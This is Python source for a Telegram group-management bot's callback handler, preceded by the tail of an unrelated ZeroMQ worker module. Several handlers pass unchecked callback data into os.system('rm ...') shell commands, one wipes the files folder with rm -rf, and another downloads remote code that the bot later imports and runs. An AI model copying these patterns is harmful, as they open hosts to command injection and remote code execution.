signal.signal(signal.SIGTERM, sigterm_handler)
with ZMQComm(cfg.addr()) as comm:
messenger = JoinMeetMessenger(name, comm, True)
messenger.protocol.add_msg_type("COMPLETE", handler=lambda args: None)
if cfg.connect_to is not None:
logger.info(f"Meeting cluster at {cfg.connect_to}")
messenger.meet(cfg.connect_to)
with Context(messenger) as ctx:
tsk.set_ctx(ctx)
# TODO: Make Executor into a context manager
logger.info("launching executor")
ctx.executor = Executor(ctx.messenger.recv, cfg)
if cfg.run is not None:
logger.info(f"with task {cfg.run}")
ctx.executor.start(cfg.run)
class SubprocessWorker:
def __init__(self, cfg):
self.cfg = cfg
self.p = multiprocessing.Process(target=zmq_launcher, args=(cfg,))
def __enter__(self):
self.p.start()
return self
def __exit__(self, exc_type, exc_value, traceback):
# TODO: softer exit?
self.p.terminate()
self.p.join()
class BlockingWorker:
def __init__(self, cfg):
self.cfg = cfg
def start(self):
zmq_launcher(self.cfg)
def zmq_run(*, cfg=None, f=None):
async def f_wrapper():
if f is not None:
result = await tsk.ctx().executor.wait_for_work(f)
tsk.ctx().executor.stop = True
f_wrapper.result = result
f_wrapper.result = None
if cfg is None:
cfg = Cfg()
cfg._build()
with ExitStack() as es:
workers = []
main_cfg = cfg.get_worker_cfg(0)
main_cfg.run = f_wrapper
workers.append(BlockingWorker(main_cfg))
for i in range(1, cfg.n_workers):
workers.append(
es.enter_context(SubprocessWorker(cfg.get_worker_cfg(i)))
)
workers[0].start()
return f_wrapper.result
|
callback.py
|
from utlis.rank import setrank,isrank,remrank,remsudos,setsudo,GPranks,IDrank
from utlis.send import send_msg, BYusers, Sendto, fwdto,Name,Glang,getAge
from utlis.locks import st,getOR,Clang,st_res
from utlis.tg import Bot
from config import *
from pyrogram import ReplyKeyboardMarkup, InlineKeyboardMarkup, InlineKeyboardButton
import threading, requests, time, random, re, json,datetime,os
import importlib
from os import listdir
from os.path import isfile, join
def updateCallback(client, callback_query,redis):
try:
json.loads(callback_query.data)
except Exception as e:
if redis.smembers("{}Nbot:botfiles".format(BOT_ID)):
onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
for f in onlyfiles:
if f in filesR:
fi = f.replace(".py","")
UpMs= "files."+fi
try:
U = importlib.import_module(UpMs)
t = threading.Thread(target=U.updateCb,args=(client, callback_query,redis))
t.setDaemon(True)
t.start()
importlib.reload(U)
except Exception as e:
pass
return False
if callback_query.inline_message_id:
if redis.smembers("{}Nbot:botfiles".format(BOT_ID)):
onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
for f in onlyfiles:
if f in filesR:
fi = f.replace(".py","")
UpMs= "files."+fi
try:
U = importlib.import_module(UpMs)
t = threading.Thread(target=U.updateCb,args=(client, callback_query,redis))
t.setDaemon(True)
t.start()
importlib.reload(U)
except Exception as e:
pass
return False
userID = callback_query.from_user.id
chatID = callback_query.message.chat.id
userFN = callback_query.from_user.first_name
title = callback_query.message.chat.title
message_id = callback_query.message.message_id
date = json.loads(callback_query.data)
group = redis.sismember("{}Nbot:groups".format(BOT_ID),chatID)
c = importlib.import_module("lang.arcmd")
r = importlib.import_module("lang.arreply")
if date[0] == "Cordertow":
rank = isrank(redis,userID,chatID)
if (rank is "sudo" or rank is "asudo" or rank is "sudos" or rank is "malk" or rank is "acreator" or rank is "creator" or rank is "owner"):
if redis.sismember("{}Nbot:{}:bans".format(BOT_ID,chatID),date[1]):
GetGprank = GPranks(date[1],chatID)
if GetGprank == "kicked":
Bot("unbanChatMember",{"chat_id":chatID,"user_id":date[1]})
redis.srem("{}Nbot:{}:bans".format(BOT_ID,chatID),date[1])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
return False
if date[0] == "delBL":
Hash = date[1]
chat = date[3]
if redis.sismember("{}Nbot:groups".format(BOT_ID),chat):
redis.delete("{}Nbot:{}:{}".format(BOT_ID,chat,Hash))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if re.search("del(.*)replys$",date[0]):
if int(date[2]) != userID:
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id,"text":r.notforyou,"show_alert":True})
return 0
t = date[0].replace("del","")
if date[1] != "kb":
redis.delete("{}Nbot:{}:{}".format(BOT_ID,date[1],t))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
redis.delete("{}Nbot:{}:{}".format(BOT_ID,chatID,t))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if re.search("del(.*)replysBOT",date[0]):
rank = isrank(redis,userID,chatID)
if rank == "sudo":
t = date[0].replace("del","")
t = t.replace("BOT","")
if date[1] != "kb":
redis.delete("{}Nbot:{}".format(BOT_ID,t))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
redis.delete("{}Nbot:{}".format(BOT_ID,t))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id,"text":r.SudoOnle,"show_alert":True})
if date[0] == "delfromb":
Hash = date[1]
chat = date[3]
if redis.sismember("{}Nbot:groups".format(BOT_ID),chat):
if Hash == "blockanimations":
ID = callback_query.message.animation.file_id
redis.srem("{}Nbot:{}:{}".format(BOT_ID,chat,Hash),ID)
Bot("deleteMessage",{"chat_id":chatID,"message_id":message_id})
if Hash == "blockSTICKERs":
ID = callback_query.message.sticker.file_id
redis.srem("{}Nbot:{}:{}".format(BOT_ID,chat,Hash),ID)
Bot("deleteMessage",{"chat_id":chatID,"message_id":message_id})
if Hash == "blockphotos":
ID = callback_query.message.photo.file_id
redis.srem("{}Nbot:{}:{}".format(BOT_ID,chat,Hash),ID)
Bot("deleteMessage",{"chat_id":chatID,"message_id":message_id})
User_click = int((redis.get("{}Nbot:{}:floodClick".format(BOT_ID,userID)) or 1))
if User_click > 10:
BY = "<a href=\"tg://user?id={}\">{}</a>".format(userID,userFN)
Bot("sendMessage",{"chat_id":chatID,"text":r.banclick.format(BY),"disable_web_page_preview":True,"parse_mode":"html"})
redis.setex("{}Nbot:floodUsers:{}".format(BOT_ID,userID),60*2,"Ban")
redis.delete("{}Nbot:{}:floodClick".format(BOT_ID,userID))
if chatID == userID:
group = True
if group is True and int(date[2]) == userID and not redis.get("{}Nbot:floodUsers:{}".format(BOT_ID,userID)):
if date[0] == "delcheck":
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.notcertain, callback_data=json.dumps(["kickcheck","",userID])),InlineKeyboardButton(r.certain, callback_data=json.dumps(["certain","",userID]))]])
random.shuffle(reply_markup.inline_keyboard[0])
Bot("editMessageText",{"chat_id":chatID,"text":r.ucertain,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "certain":
Bot("restrictChatMember",{"chat_id": chatID,"user_id":userID,"can_send_messages": 1,"can_send_media_messages": 1,"can_send_other_messages": 1,"can_send_polls": 1,"can_change_info": 1,"can_add_web_page_previews": 1,"can_pin_messages": 1,})
T ="<a href=\"tg://user?id={}\">{}</a>".format(userID,Name(userFN))
Bot("editMessageText",{"chat_id":chatID,"text":r.unrestricted.format(T),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
if date[0] == "kickcheck":
Bot("kickChatMember",{"chat_id":chatID,"user_id":userID})
T ="<a href=\"tg://user?id={}\">{}</a>".format(userID,Name(userFN))
crid = redis.get("{}Nbot:{}:creator".format(BOT_ID,chatID))
redis.sadd("{}Nbot:{}:bans".format(BOT_ID,chatID),userID)
reply_markup = InlineKeyboardMarkup([[InlineKeyboardButton(r.Corder, callback_data=json.dumps(["Cordertow",userID]))]])
Bot("editMessageText",{"chat_id":chatID,"text":r.bancheck.format(T),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "delF":
File = date[1]
os.system("rm ./files/"+File)
Bot("editMessageText",{"chat_id":chatID,"text":r.Delfile.format(File),"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
if date[0] == "delFa":
os.system("rm -rf ./files/*")
Bot("editMessageText",{"chat_id":chatID,"text":r.Delfiles,"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
if date[0] == "dlf":
File = date[1]
os.system("rm ./files/"+File)
url = "https://raw.githubusercontent.com/TshAkEAb/TshakeV2-files/master/"+File
out = requests.get(url).text
f = open("./files/"+File,"w+")
f.write(out)
f.close()
Bot("editMessageText",{"chat_id":chatID,"text":r.Dua.format(File),"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
if date[0] == "au":
File = date[1]
if redis.sismember("{}Nbot:botfiles".format(BOT_ID),File):
redis.srem("{}Nbot:botfiles".format(BOT_ID),File)
else:
redis.sadd("{}Nbot:botfiles".format(BOT_ID),File)
onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
array = []
for f in onlyfiles:
if f in filesR:
s = r.true
else:
s = r.false
array.append([InlineKeyboardButton(f+" "+s,callback_data=json.dumps(["au",f,userID]))])
kb = InlineKeyboardMarkup(array)
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":kb})
if date[0] == "twostepset":
get = date[1]
if get == "eq":
redis.hset("{}Nbot:bancheck:t".format(BOT_ID),chatID,"two")
tx = r.Ttwo
g= "two"
if get == "two":
redis.hdel("{}Nbot:bancheck:t".format(BOT_ID),chatID)
g= "eq"
tx = r.Teq
kb = InlineKeyboardMarkup([[InlineKeyboardButton(r.tset.format(tx),callback_data=json.dumps(["twostepset",g,userID]))]])
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":kb})
if date[0] == "floodset":
get = date[1]
if get == "ban":
redis.hset("{}Nbot:floodset".format(BOT_ID),chatID,"res")
tx = r.Tres
g= "res"
if get == "res":
redis.hset("{}Nbot:floodset".format(BOT_ID),chatID,"ban")
g= "ban"
tx = r.Tban
kb = InlineKeyboardMarkup([[InlineKeyboardButton(r.fset.format(tx),callback_data=json.dumps(["floodset",g,userID]))]])
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":kb})
if date[0] == "delmsgclick":
Bot("deleteMessage",{"chat_id":chatID,"message_id":message_id})
Bot("deleteMessage",{"chat_id":chatID,"message_id":callback_query.message.reply_to_message.message_id})
if date[0] == "ckGPs":
rank = isrank(redis,userID,chatID)
if rank == "sudo":
Bot("editMessageText",{"chat_id":chatID,"text":r.ckpr,"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
IDS = redis.smembers("{}Nbot:groups".format(BOT_ID))
i = 0
for ID in IDS:
get = Bot("getChat",{"chat_id":ID})
if get["ok"] == False:
redis.srem("{}Nbot:groups".format(BOT_ID),ID)
redis.sadd("{}Nbot:disabledgroups".format(BOT_ID),ID)
NextDay_Date = datetime.datetime.today() + datetime.timedelta(days=1)
redis.hset("{}Nbot:disabledgroupsTIME".format(BOT_ID),ID,str(NextDay_Date))
i+=1
time.sleep(0.3)
pr = redis.scard("{}Nbot:privates".format(BOT_ID))
gp = redis.scard("{}Nbot:groups".format(BOT_ID))
Bot("editMessageText",{"chat_id":chatID,"text":r.showstats.format(gp,pr)+r.Dckg.format(i),"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
else:
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id,"text":r.SudoOnle,"show_alert":True})
if date[0] == "Chlang":
name = date[1]
redis.srem("{}Nbot:lang:ar".format(BOT_ID),chatID)
redis.srem("{}Nbot:lang:arem".format(BOT_ID),chatID)
redis.srem("{}Nbot:lang:en".format(BOT_ID),chatID)
redis.sadd("{}Nbot:lang:{}".format(BOT_ID,name),chatID)
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":Clang(client, callback_query,redis,r)})
if date[0] == "ShowDateUser":
t = IDrank(redis,userID,chatID,r)
msgs = (redis.hget("{}Nbot:{}:msgs".format(BOT_ID,chatID),userID) or 0)
edits = (redis.hget("{}Nbot:{}:edits".format(BOT_ID,chatID),userID) or 0)
rate = int(msgs)*100/20000
age = getAge(userID,r)
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(Name(userFN),url="t.me/CCCCCD")],[InlineKeyboardButton(r.Rrank.format(t),url="t.me/CCCCCD")],[InlineKeyboardButton(r.Rmsgs.format(msgs),url="t.me/CCCCCD")],[InlineKeyboardButton(r.Rrate.format(str(rate)+"%"),url="t.me/CCCCCD")],[InlineKeyboardButton(r.Redits.format(edits),url="t.me/CCCCCD")],[InlineKeyboardButton(r.Rage.format(age),url="t.me/CCCCCD")]])
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if re.search("ShowO",date[0]):
T = date[0].replace("ShowO","")
rank = isrank(redis,userID,chatID)
if T == "lock":
reply_markup = getOR(rank,r,userID)
tx = r.LockO
if T == "admin":
reply_markup = getOR(rank,r,userID)
tx = r.AdminO
if T == "owner":
reply_markup = getOR(rank,r,userID)
tx = r.OwnerO
if T == "creator":
reply_markup = getOR(rank,r,userID)
tx = r.CreatorO
if T == "sudos":
reply_markup = getOR(rank,r,userID)
tx = r.SudosO
if T == "sudo":
reply_markup = getOR(rank,r,userID)
tx = r.SudoO
Bot("editMessageText",{"chat_id":chatID,"text":tx,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "sendtogroups":
Bot("editMessageText",{"chat_id":chatID,"text":r.PRsendtoGP,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
done,dont = Sendto(redis,callback_query,"groups")
Bot("editMessageText",{"chat_id":chatID,"text":r.DsendtoGP.format(done,dont),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
redis.delete("{}Nbot:donesend".format(BOT_ID))
redis.delete("{}Nbot:dontsend".format(BOT_ID))
if date[0] == "sendtoprivates":
Bot("editMessageText",{"chat_id":chatID,"text":r.PRsendtoPR,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
done,dont = Sendto(redis,callback_query,"privates")
Bot("editMessageText",{"chat_id":chatID,"text":r.DsendtoPR.format(done,dont),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
redis.delete("{}Nbot:donesend".format(BOT_ID))
redis.delete("{}Nbot:dontsend".format(BOT_ID))
if date[0] == "fwdtogroups":
Bot("editMessageText",{"chat_id":chatID,"text":r.PRsendtoGP,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
done,dont = fwdto(redis,callback_query,"groups")
Bot("editMessageText",{"chat_id":chatID,"text":r.DsendtoGP.format(done,dont),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
redis.delete("{}Nbot:donesend".format(BOT_ID))
redis.delete("{}Nbot:dontsend".format(BOT_ID))
if date[0] == "fwdtoprivates":
Bot("editMessageText",{"chat_id":chatID,"text":r.PRsendtoPR,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
done,dont = fwdto(redis,callback_query,"privates")
Bot("editMessageText",{"chat_id":chatID,"text":r.DsendtoPR.format(done,dont),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
redis.delete("{}Nbot:donesend".format(BOT_ID))
redis.delete("{}Nbot:dontsend".format(BOT_ID))
if date[0] == "kickme-yes":
Bot("kickChatMember",{"chat_id":chatID,"user_id":userID})
Bot("unbanChatMember",{"chat_id":chatID,"user_id":userID})
Bot("editMessageText",{"chat_id":chatID,"text":r.Dkickme,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
if date[0] == "kickme-no":
Bot("editMessageText",{"chat_id":chatID,"text":r.Nkickme,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
if date[0] == "delfromb":
Hash = date[1]
if Hash == "blockanimations":
ID = callback_query.message.animation.file_id
redis.srem("{}Nbot:{}:{}".format(BOT_ID,chatId,TY),ID)
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneUNblock,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "Blocklist":
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(c.STword,callback_data=json.dumps(["showBlocklist","",userID])),InlineKeyboardButton(c.STgifs,url="https://telegram.me/{}?start=showBlocklist={}={}={}".format(Botuser,chatID,userID,"blockanimations")),],[InlineKeyboardButton(c.STphoto,url="https://telegram.me/{}?start=showBlocklist={}={}={}".format(Botuser,chatID,userID,"blockphotos")),InlineKeyboardButton(c.STsticker,url="https://telegram.me/{}?start=showBlocklist={}={}={}".format(Botuser,chatID,userID,"blockSTICKERs")),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.blocklist.format(r.blocklist2,title),"message_id":message_id,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "replylist":
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(c.STword,callback_data=json.dumps(["showreplylist","",userID])),InlineKeyboardButton(c.STgifs,callback_data=json.dumps(["showGFreplylist","",userID])),],[InlineKeyboardButton(c.STvoice,callback_data=json.dumps(["showVOreplylist","",userID])),InlineKeyboardButton(c.STsticker,callback_data=json.dumps(["showSTreplylist","",userID])),],[InlineKeyboardButton("Mp3",callback_data=json.dumps(["showAUreplylist","",userID]))]])
Bot("editMessageText",{"chat_id":chatID,"text":r.blocklist.format(r.replylist,title),"message_id":message_id,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "replylistBOT":
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(c.STword,callback_data=json.dumps(["showreplylistBOT","",userID])),InlineKeyboardButton(c.STgifs,callback_data=json.dumps(["showGFreplylistBOT","",userID])),],[InlineKeyboardButton(c.STvoice,callback_data=json.dumps(["showVOreplylistBOT","",userID])),InlineKeyboardButton(c.STsticker,callback_data=json.dumps(["showSTreplylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.blocklist.format(r.replylistBot,title),"message_id":message_id,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "alllist":
reply_markup=InlineKeyboardMarkup(
[[InlineKeyboardButton(c.STbanall,callback_data=json.dumps(["showbanall","",userID]))
,InlineKeyboardButton(c.STtkall,callback_data=json.dumps(["showtkall","",userID])),]
])
Bot("editMessageText",{"chat_id":chatID,"text":r.banlist,"message_id":message_id,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "delallban":
redis.delete("{}Nbot:bans".format(BOT_ID))
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Ddelbanall,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "delalltk":
redis.delete("{}Nbot:restricteds".format(BOT_ID))
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Ddeltkall,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "showBlocklist":
li = redis.smembers("{}Nbot:{}:blockTEXTs".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - "+word
i += 1
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.BlocklistRm,callback_data=json.dumps(["delListblockTEXTs","",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["Blocklist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["Blocklist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.BlocklistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showbanall":
arrays = redis.smembers("{}Nbot:bans".format(BOT_ID))
if arrays:
b = BYusers(arrays,chatID,redis,client)
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.allbandel,callback_data=json.dumps(["delallban","",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":b,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup,"parse_mode":"markdown"})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.allbanE,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showtkall":
arrays = redis.smembers("{}Nbot:restricteds".format(BOT_ID))
if arrays:
b = BYusers(arrays,chatID,redis,client)
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.alltkdel,callback_data=json.dumps(["delalltk","",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":b,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup,"parse_mode":"markdown"})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.alltkE,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showreplylist":
li = redis.hkeys("{}Nbot:{}:TXreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"TXreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.replylistRm,callback_data=json.dumps(["delTXreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.replylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showAUreplylist":
li = redis.hkeys("{}Nbot:{}:AUreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"STreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("📂꒐ قائمة الصوتيات فارغة",callback_data=json.dumps(["delSTreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":"📂꒐ قائمة الصوتيات فارغة","message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showSTreplylist":
li = redis.hkeys("{}Nbot:{}:STreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"STreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.STreplylistRm,callback_data=json.dumps(["delSTreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.STreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showGFreplylist":
li = redis.hkeys("{}Nbot:{}:GFreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"GFreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.GFreplylistRm,callback_data=json.dumps(["delGFreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.GFreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showVOreplylist":
li = redis.hkeys("{}Nbot:{}:VOreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"VOreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.VOreplylistRm,callback_data=json.dumps(["delVOreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.VOreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showreplylistBOT":
li = redis.hkeys("{}Nbot:TXreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylistBOT={}={}={}".format(Botuser,chatID,userID,"TXreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.replylistRm,callback_data=json.dumps(["delTXreplysBOT","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.replylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
